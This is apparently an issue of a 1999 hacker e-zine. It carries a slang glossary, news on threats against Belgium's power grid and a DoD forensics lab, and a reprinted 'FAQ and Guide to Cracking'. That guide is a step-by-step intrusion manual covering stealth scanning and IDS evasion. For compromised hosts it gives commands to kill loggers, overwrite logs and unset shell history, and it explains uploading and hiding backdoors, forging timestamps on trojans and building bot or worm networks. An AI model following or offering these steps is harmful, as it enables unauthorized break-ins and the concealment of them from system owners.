2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(No mail worthy of posting here this issue,)
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Forbidden Knowledge has released #7, our props to the FK crew and 2600ZA,
*
* SLa5H is back with news and views from .hr
*
* this issue is a little delayed as i'm getting used to a new keyboard, and
* i've been sick with a bad cold...anyway the hardware...
* natural style keyboard by Micro innovations, its a wicked awesome keyboard
* but my typing speed has to adjust from the trashy standard keyboard I was
* using. i've added a 17 Gig HD to the 10 Gig thats already in my main server
* to go online at some point too and got myself some new cpu speakers ...
*
* Cruciphux
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 The Real ReDATtAck poised to Attack Belgium?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Zym0t1c,
September, 28th 99 - A hacker who claims to be the real Redattack plans to
shut down all the electricity in Belgium for about three hours tomorrow
(29th). It'll take place from 1.30pm till 4.30pm. It'll last three hours
because the generators of hospitals and the airport of Belgium can provide
electricity for four hours and he doesn't want anyone getting killed.
He claims to have hacked Electrabel (Belgian elektricity provider) and
Belgacom (the biggest telephone company of Belgium (remember also ISP
Skynet?)) He will also release some secret phone numbers of Belgacom
clients and Proximus (cellular phone section of Belgacom) on the Internet
(however no site was mentioned).
Since the original ReDaTtAcK was more a mediawhore than a hacker (considered
by the hacking ethic), this new Redattack took his name, so he claims...
And if the government still doesn't take actions against crimes (?!!??) like
these, he will shut down the whole country next week. We'll see...
Is this a game of 'who's the best Belgian hacker?' I hope not, because real
hackers sometimes suffer because of these (sorry) idiots.
Also today - The original ReDaTtAcK claims to have hacked Planet Internet,
also one of the biggest ISP's of Belgium. He could see some encrypted
VISA-numbers and some client information. Planet Internet has increased
their security. They press no charges against him. ReDaTtAcK also claims
to have found an underground childporn network of a school in Belgium. He
gave the information to the police of Gent, but they say his information was
incomplete and maybe incorrect.
Update
~~~~~~~
The original ReDaTtAcK wil be RA1
The second, so called 'real' Redattack will be RA2, okay? :)
Sept, 29th 1999 - Belgium
First of all, yesterday I wrote that RA1 claimed to have found an underground
child porn network... Well, nothing of that is true, so say the authoroties. RA1
just acted as a little girl on a chatroom and drow the attention of a man. The man
wanted to settle a little appointement between the two of them... Therefore, RA1
gave the information to the authoroties assuming he had found a network. The police
says RA1 exaggerated, although there might follow an investigation...
Second, RA2 mailed our newspapers yesterday saying he was impressed by the added
security of Electrabel (Belgian electricity provider). He will not shut down the
electricity but he will just try to break into the system and leave a logo or
something. The IT-staff of Electrabel is rather relax about it. They claim their
security system is unique, because they invented it, and it uses a system that
practically no-one knows how to use, except the IT-staff of Electrabel of course.
So, if he hacks the system, he first needs to learn using the system before he can
actually do something... They are interested in the vulnerabilities of their system
and hope that if RA2 succeeds, he will explain the holes found in their system.
/**
I've also heard of a few people that RA1 has offered his services to Electrabel to
secure their system. I haven't read it or heard it on the radio, it's just what
I've heard (maybe rumours), so I cannot prove it. Are they really playing a game of
who's the best or who gets the most media attention?
**/
The newspaper wrote also that they think RA2 was exaggerating about his skills.
Two days ago he was so sure about hacking this computer and see what happens now:
he pulls back. "When I cannot hack the system, I will make positive publicity about
their security system.", says RA2. Jeezes man! :))
Third, Belgacom (biggest Belgian phone service provider) is pressing a charge against
RA2. He claimed to kill all phonelines in Belgium and to publish secret phone and GSM
numbers on the Internet. Well, there actually was a list with some phone numbers on the
Internet, so people thought he really hacked Belgacom's system and copied the list.
Guess what??? He published some phone and GSM numbers from Advalvas.com. The numbers
were from people who registered for an emailadres and left their phone and GSM numbers... :)
Because of the fact that RA2 threatened with criminal facts like killing the phone lines
and publishing secret numbers, Belgacom pressed a charge against unknown people (referring
to RA2, although they just know he's 22 and he's an IT'er).
Since there has been a charge against him, the police could trace him.
We'll see...
I also added the newspaper article of the same newspaper 'De Standaard' and it's again in
dutch! Sorry for this! :)))
zym0t1c@ping.be
HNN's Coverage; Belgium Electric Company Threatened by Cyber Intruder
contributed by Maxim.Glory
Belgian electricity provider Electrabel has been
threatened by an an unknown assailant. The cyber
intruder has threatened to turn off all power in the
country sometime between 1:30 and 3:30 pm CET on
Wednesday. According to an Electrabel spokesperson
the system controlling Electrabel's distribution of power
is custom made and the connections are therefore extra
protected. (Oh yeah, security through obscurity, that
always works.)
Svenska Dagbladet - Swedish
http://www.svd.se/paper.asp?menu=/dynamiskt/huvudmeny/did_276436.asp&main=/dynamiskt/senaste_nytt/did_277456.asp
Excite News
http://news.excite.com/news/r/990928/08/odd-hacker
Electrabel
http://www.electrabel.be/
Late Update 0830
contributed by Yaxmon
Minutes after we went to press HNN learned that the
attacker who goes by the name ReDaTtAcK 2, has
withdrawn his threat and now says that he will not be
turning off the power. (Of course now people will
wonder if he ever could have and this person who did
n
othing more than make a phone call will forever be
labeled as a 'hacker'. Thanks.)
Reuters
http://www.reuters.com/news/oddly_enough/
Excite;
Hacker Threatens To Leave Country In The Dark
Updated 8:10 AM ET September 28, 1999
BRUSSELS (Reuters) - A computer hacker has threatened to break into the computers of Belgian electricity generator Electrabel
Wednesday afternoon and halt the power supply to the entire country.
"Tomorrow I will leave Belgium without power, and that is not so difficult," the anonymous hacker told the Belgian newspaper Het
Laatste Nieuws.
"Wednesday I will get into Electrabel's computers between 1:30 and 3:30 in the afternoon and shut down all the electricity," the
hacker said.
Electrabel, which has a virtual monopoly on Belgium's electricity market, said it was taking the threat seriously but felt that the
hacker had little chance of succeeding.
"There is very little chance that Belgium could be without power," Electrabel spokesman Phillipe Massart told RTBF television.
"Nonetheless, the risk that someone could access the system always exists."
Massart said the systems that pilot Electrabel's power distribution were developed specifically for the company and have protected
connections. He said the company was taking measures to ensure its security.
Hacker Changes Mind About Switching Off Country
Updated 9:55 AM ET September 29, 1999
BRUSSELS (Reuters) - A computer hacker has backed down from a threat to break into the computers of Belgian electricity
generator Electrabel Wednesday afternoon and cut the nation's power supply, Electrabel said.
The hacker, who calls himself ReDaTtAcK 2, phoned Electrabel, which has a virtual monopoly on Belgium's electricity market, to
withdraw the threat.
"I had this guy on the phone," spokesman Patrick De Vos told Reuters. "He withdrew his threat. It's a non-event."
The hacker launched a crusade earlier in the summer, attacking Web sites in an attempt to alert Belgium to the security risks of the
Internet.
De Vos said the hacker had threatened to break into Electrabel's computers to prove the system's vulnerability.
"He would like to try and find a hole and insert his business card and say this is a failure in the system," De Vos said.
He said the company had taken the threat seriously but did not believe its system had ever been at risk.
@HWA
04.0 FAQ and Guide to Cracking by Mixter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://blacksun.box.sk/
-----BEGIN PGP SIGNED MESSAGE-----
FAQ and Guide to Cracking
(c) 1999 by Mixter
Disclaimer:
This is a theoretical instruction to cracking and for informational
purposes. It should be seen as an introduction to the methods and
strategies used by crackers rather than a howto. The author is not
suggesting to perform illegal actions and cannot be held liable
for any actions of other individuals who perform any of the actions
discussed in this paper and possible resulting damage.
Introduction:
I am going to describe the methods and strategies used to access
various UNIX hosts among the internet unauthorizedly. This guide will
not teach you how to hack, neither do you have to be a hacker to use
the techniques described here. Hacking means finding your own way
to do it, and finding new approaches to accomplishing something. I am
only going to supply you with one possible approach to cracking.
I. Prerequisites
Operating System:
You certainly need Unix installed on your home computer. WINDOWS
WILL NOT DO IT. I'm not going into details here, but you should take
either Net/Open/FreeBSD or Linux because they are POSIX compliant,
suitable for Home PC's and most small network tools will compile
on them. If you use Linux [1], you should not use the RedHat, SuSE, or
Slackware distributions unless you know how to secure them properly.
Local root compromise can be fatal as you may reveal your identity.
Basic Knowledge:
Get experienced in the use with the following tools. Use the 'man' command,
and work with them until you fully understand them. These tools are:
awk cat chmod dd grep gzip kill ln
ls mail mknod more mount ping ps sed
sort tar ifconfig ipfwadm last head tail
gcc cut find ftp less vim nc (netcat)
rcp xhost xterm syslogd inetd telnet ssh finger
Security requirements:
You need to make sure that no one can compromise your own host. Check
security sites to make sure your daemons (servers) are not exploitable.
Do not allow anyone to use your box. Disable telnet, rlogin, and whatever
you don't need yourself. Ideally, you do not run any servers at all while
you are attacking other hosts. Consider encrypting directories and/or
complete partitions with encrypted file systems and encrypt emails and
files you transfer with PGP. [2]
Account:
For your activities, you require an ISP account with a direct connection,
which normally all ISP provide. You might want to consider not doing
any 'cracking' activities from your home at all, in which case you need
a fast linux or bsd shell account, which must not be from a commercial
shell provider (esp. those who sell eggdrop and irc accounts), and if
you use a university account, you need to make sure that they do not
watch / monitor their users. If you use a dialup, ensure yourself that
no transparent proxies or network monitors (squid etc.) are being run by
your provider. Do a traceroute and check your providers backbone routers
for NIDS (Intrusion Detection), network monitors, proxies, and anything
that seems unusual; alternatively let someone with more knowledge do it.
II. Scanning
Avoiding track-downs:
Where you scan from is up yours. Whatever you do, don't scan from your
dialup while using a legit internet account. Everyone knowing your IP is
a phone call to your provider away from knowing your identity. If you
use fake accounts, avoid using fake or stolen credit cards to make them.
Also avoid using 1-800 numbers at all costs, because the 1-800 nodes
generally log every calling phone number with access time. Inquire about
the ISP you use to make sure he is not in explicit cooperation with federal
agencies. Additionally, do not stay longer than 5 (in words: five) hours
on the internet without hanging up and reconnecting. Why? If you are
logged on, the node has your account associated with your current
dynamic IP address for obvious technical reasons, and they also might
be able to trace you. Most nodes will not keep a table of which IP
belongs to which account once they disconnected, especially on huge
ISP where this would take large additional resources.
I disrecommend traversing through WinGate and SOCKS servers,
because they give you a fake feeling of safety. Often, these servers are
logging every access and sometimes they are put up by federal agencies
itself. You should ideally relay your connections through a server you
have root, hence full control, on, using datapipe, bnc, ssl, or a
wingate/socks server with logging completely disabled.
Stealthy scanning:
A scan not being noticed is a successful scan. Half-Open (SYN)
scans are lame, because many daemons will still report a
"warning: can't get client address: Connection reset by peer"
or similar message, then have someone turn on a sniffer or tcplogd
and they see who is scanning them. Advanced and recommended scans
are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe),
and Maimon scans, which can be done with nmap [3]. If you use
connect() scans, which are much more reliable, then use lscan,
and get the version info. This generally makes the most sense
because you have to get the daemon's versions anyway to see
if it is exploitable.
Play dead:
As you scan, I strongly recommend disabling every single service
on the machine you're scanning from and setting packet filtering
rules. This will fool the hosts being scanned into thinking your
host is down and the scan is spoofed.
A few things you should disable:
* Inetd ( identd, finger, ftp, telnet )
* All INCOMING tcp connection requests (ipfwadm: -y flag)
* ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17)
* UDP Traceroute queries (udp port range 33400-33500)
Also note that -deny is better than -reject, which would send
an ICMP unreach packet back instead of keeping totally silent.
Non-sequential scanning:
This is important: Use non-sequential scanning to avoid
intrusion detection systems. An IDS or NIDS is installed on a gateway
or router and monitors unusual traffic to certain ports. If you scan
1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc.,
an intrusion detection system can detect your scan against 1.1.1.*.
Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2
You get the point.
What to scan:
Most crackers resolve a top-level domain like .com .net or a
country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or
by using a simple recursive shell script. host -l domain will
not do for a scan, because you'll miss all the subnets that way,
and there are plenty of them.
However, I'd rather suggest scanning complete IP blocks. Depending
on your greed, you can either scan a class B (1.1.*.*) or class A
(1.*.*.*) network. You might wish to obtain some information about
your targets first. To do this, you can query whois.arin.net, the
registration center for IP addresses. Lets say you want to scan
192.168.*.* and you want to know who owns that IP block. Type:
whois -h whois.arin.net 192.168.0.0
or
whois 192.168.0.0@whois.arin.net
and you get a short description of the owners of that netblock.
If arin.net doesn't find any information, don't scan it, because
the IPs are probably not yet in use. Some info on the 'whois'
results...
Maintained by RIPE.NET = European (no, uk, ch, at, de, se, dk, etc.)
Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.)
Maintained by NIC.xxx = Belonging to country xxx
Finding vulnerable hosts:
First rule of scanning is: never delete your scan logs. If
you think you are completely done with evaluating your logs,
then compress, encrypt and store them, dont delete them. New
security vulnerabilities will be found sooner or later, then you
won't have to scan it all again.
From my experience, the vulnerability scanners are almost all
bullshit, you dont need them. Use grep and awk to extract the
IP numbers from your scan logs, like this...
grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt
(presuming that your scanner logs like this: "<IP> - <CAPTURED VERSION>")
There are a couple of cases where you need an additional scan
to find vulnerable versions, which are:
Buggy Daemon Scanner Scans for...
wu-ftp BETA-18 wuftpscan/ben (private) Writable dir
portmap rpcinfo -p (unix tool) Portmap Version
ttdbserver rpcinfo ttdb version
rstatd statdscan rstatd version
mountd mountdscan (rootshell) mountd/nfs version
bind binfo-udp (rootshell), bind version
nscan (my site),
mbind (private)
III. Rooting
Lets think about the first commands you issue. They should:
1. Discretely remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)
Here are my suggestions...
1. killall -9 syslogd klogd - pesky loggers! only few admins
will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages
Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn't exist,
truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in
/var/named or even /. Very unprofessional :).
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf...
Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the
more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to
remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate
the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon's etc before you do anything great on the host.
If you are paranoid, traceroute the host, and see if non-routers
are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd,
or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin
will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
<uu encoded junk appears, which you copy with your mouse>
(on the target box)
uudecode
<it waits for input, paste the uuencoded stuff, page-by-page>
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on
port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c
As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider
not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an
exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are
active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor,
talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile.. but it is
a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell,
to see what you need to do to patch your buggy stuff. If RPM is
installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm
If not, use ncftp to fetch the file anonymously, because it doesn't need
user interaction. If you want, add an additional backdoor in your
"patched" server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps,
which wont help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime
to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash
over your freshly added trojan. Voila!
The alternative to all this for lazy people is, to add a
ipfwadm rule that prevents traffic from the outside (-W eth0)
to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn't need tcp port 53 for anything
except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you
detected, lets say if you disable port 110 or 143 on an ISP's
central mail exchange server...
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP,
ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they
open that host to everyone, letting in sniffers, and probably
other people who may damage the host seriously. Make sure to
password protect everything that runs as root. A password
of a minimum length of 8 characters, because you have no way
of detecting a brute force attack. For the C programmers, let
me say, listen(sockfd,1). Maybe 2 connections, but not more.
For comfortability, you can add some stuff you want to occur
on each successful backdoor login, like system("w"),
system("killall -9 syslogd klogd"), or whatever. If you want a
front-end backdoor with some integrated functions, try gateway[5].
IV. UTILIZING COMPROMISED SYSTEMS
About your activities:
Do what you desire, but never without disregarding stealthiness.
If you stop checking log files, processes, or start something
like ping -s 1024 -f cert.org un-stealthed, it is, depending
on the admin, a matter of hours or days until you lose the host.
Most of the time, losing a host means you cannot get access again,
and the admins will examine their system with extreme scrutiny;
if they are too lame, they might contact some external security
experts or even the Computer Emergency Response Team.
Never do serious damage to the system, when you don't have to -
and trust me, you won't. Damaging a system by altering vital system
files, replacing frequently-used programs or even destroying
information is unintelligent, will not do you any good, and will
maybe assist you in getting new enemies.
And it is trivial to mention not to deface web sites...
World domination:
As the number of systems you control increases, you might want
some kind of easy remote control, utilization for attacks,
and detection of detection of your activities. You can install
newnick bots or eggdrop bots with fancy scripts which can be
controlled through IRC to make life easier (make sure to sit and
think before you consider doing anything big with them on IRC!).
You can make your own inter-linked network of root systems,
in which case you need to start programming because no one will
release such a program to the public. :)
You can make a little packages with spoofing flooders, smurf
and the like, if you decide becoming a packet warrior (then again,
it won't help you accomplishing anything but getting irc channels
or shutting down government sites...).
Alternatively, you can use every root you get to scan new netblocks,
and have the information mailed to you or whatever. You can make
an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm
(the last 2 are private), and install them on your roots; make sure
it is well constructed and bug-free...
If you are a creative person, you can make them scan large amounts
of ISP dialup netblocks for back orifice, netbus server, backdoor G,
and what not, and write something that controls their computers
to spread more trojans, send their mail to you, get their
passwords, flood, scan, invade their private lives...
no wait, that's the governments job.
V. YOUR PRESENCE ON THE NET
Smart behavior and senseless behavior:
What you do besides cracking, mostly happens on IRC. IRC
should be seen as a tool for getting in touch with other
skilled persons and exchanging thoughts and information.
To avoid wasting your time, skills, and possibly getting
busted, here are some things which you SERIOUSLY should
not be doing:
1) Warez. Stay away from warez, it is a waste of time.
Warez ruins productive people and makes software expensive.
Besides the moral bullshit, you can always get something
you really need (#1 net game, enterprise application etc.),
and you don't need much, trust me. Almost everything
security / hacking related is free. Joining a warez group
gets you a) alot of vhosts with lame names b) idiotic
friends c) on the FBI blacklist - nothing besides that.
2) 'IRC War'. Groups like core, chrome, enforce, conflict,
takeover, madcrew, phorce, tnt, etc. etc. who call themselves
'War' groups, are good for nothing. Why would you want to
be a member of a group that attacks other similar groups
and channels - it is comparable to the mafia - almost
as violent, dangerous, except that you don't get rich.
If you think you need 'WarGroup' support for taking a
channel with reasonable security, you are lame or you
can't take a challenge. Think again.
3) Hacking related groups. Inform yourself about what
happened to gH or 'global Hell'. Most of these groups
do the exact opposite of what is advised in this paper.
If you get an offer to join:
l0pht, cDc, MOD, thc, or ADM, take it because you'll
learn a lot, all other groups are not worth your time.
4) IRC operators, BOFH, admin of big systems. Stay away
from them until you are confidently prepared and willing
to fight with them. Blindly attacking them can also be a waste
of time, but it can also become a reasonable challenge.
Keep up to date:
The more you advance in cracking skills, or even might
consider hacking, programming or developing, the web
probably gets the part of the web you use least.
Visit your favorite security related sites frequently,
and make sure to keep up to date about security breaches,
law enforcement, exploits, changes in the methods of
crackers and admins. My bookmarks certainly include
Packetstorm security [6] and GeekGirl [7].
URLS:
[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH
A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU
E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV
JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T
7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz
JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA==
=o8mY
-----END PGP SIGNATURE-----
@HWA
05.0 DOD Launches Computer Crime Lab
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by x-empt
The Department of Defense unveiled the newest
high-tech crime laboratory last Friday. Technology
within the lab supposedly has the ability to "trace
hackers across the Internet", break encryption and
rebuild cut up floppy diskettes. The new Defense
Computer Forensics Lab located near Baltimore MD,
(very close to NSA Headquarters) will be staffed by a
team of 80 personnel to help investigate espionage,
murder and other crimes, as well as training other
investigators.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/890127l.htm
Posted at 3:21 p.m. PDT Friday, September 24, 1999
High-tech crime-fight Lab unveiled
BY TED BRIDIS
Associated Press Writer
LINTHICUM, Md. (AP) -- The Defense Department showed off its latest arsenal of
high-tech crime-fighting tools Friday, a $15 million computer lab where it can trace
hackers across the Internet, unscramble hidden files and rebuild smashed floppy disks
that were cut in pieces.
Investigators will use the new Defense Computer Forensics Lab, located in a nondescript
brick building south of Baltimore, to unravel electronic evidence in cases of espionage,
murder and other crimes involving America's military.
Using powerful computers and special software, these 80 digital detectives can trace a
hacker across the Internet to his keyboard, recover files thought to be safely deleted and
quickly search tens of thousands of documents for an important phrase.
Cyberspace is ``a new kind of wild, lawless sort of frontier,'' said Christopher Mellon, a
deputy assistant Defense secretary. ``We have important national interests, and we have
to be able to function.''
Organizers envision sharing equipment and secret techniques they develop to help FBI, state and local authorities prosecute
criminals who use computers, such as drug-dealers who track profits and customers with accounting software.
The FBI even established its own minilab upstairs in the building, though most of its digital forensics work will continue to be
performed in downtown Washington at its headquarters.
``Virtually every white-collar crime case today brings at least one computer, if not a whole network of computers,'' FBI Assistant
Director Donald Kerr said. ``We need people who are well prepared.''
David Ferguson, the lab's director, showed how experts can use these high-tech tools to enhance garbled audio recordings -- even
digitally mute one voice in a conversation to listen to another -- and recover computer files from disks and tapes even if they had
been deleted.
The lab can dissect virtually any type of computer, from handheld devices to Apple computers to those using Windows or even
specialized software. It's developing a way to analyze all machines using a powerful assembly of computers working together,
